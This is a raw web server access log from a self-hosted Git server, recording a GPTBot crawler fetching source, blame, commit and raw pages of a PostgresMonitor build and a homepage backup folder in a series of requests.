"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 10215] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 29874] [Gzip 12.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6.diff" [Client 74.7.227.38] [Length 397105] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" +[17/Feb/2026:13:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore" [Client 74.7.227.38] [Length 11836] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore" +[17/Feb/2026:13:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13141] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services" +[17/Feb/2026:13:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build" [Client 74.7.227.38] [Length 10164] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build" +[17/Feb/2026:13:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10198] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 10430] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" [Client 74.7.227.38] [Length 10086] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" +[17/Feb/2026:13:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html" +[17/Feb/2026:13:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11517] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" +[17/Feb/2026:13:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12780] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" +[17/Feb/2026:13:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11643] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" +[17/Feb/2026:13:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md" [Client 74.7.227.38] [Length 11340] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" +[17/Feb/2026:13:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10946] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets" [Client 74.7.227.38] [Length 10821] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" +[17/Feb/2026:13:15:27 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" +[17/Feb/2026:13:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html" [Client 74.7.227.38] [Length 13283] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html" +[17/Feb/2026:13:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11000] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10998] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts" +[17/Feb/2026:13:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx" +[17/Feb/2026:13:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx" +[17/Feb/2026:13:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md" +[17/Feb/2026:13:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets" [Client 74.7.227.38] [Length 10094] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets" +[17/Feb/2026:13:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9959] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md" +[17/Feb/2026:13:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 8597989] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 17184] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 48960] [Gzip 17.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 3141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 22899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9544] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 18353] [Gzip 11.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 3636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12516] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx" +[17/Feb/2026:13:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx" +[17/Feb/2026:13:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts" +[17/Feb/2026:13:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html" +[17/Feb/2026:13:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12939] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" +[17/Feb/2026:13:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10983] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup" [Client 74.7.227.38] [Length 106378] [Gzip 10.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup" +[17/Feb/2026:13:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" +[17/Feb/2026:13:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js" [Client 74.7.227.38] [Length 10047] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets" +[17/Feb/2026:13:15:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10961] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:15:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" +[17/Feb/2026:13:15:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr 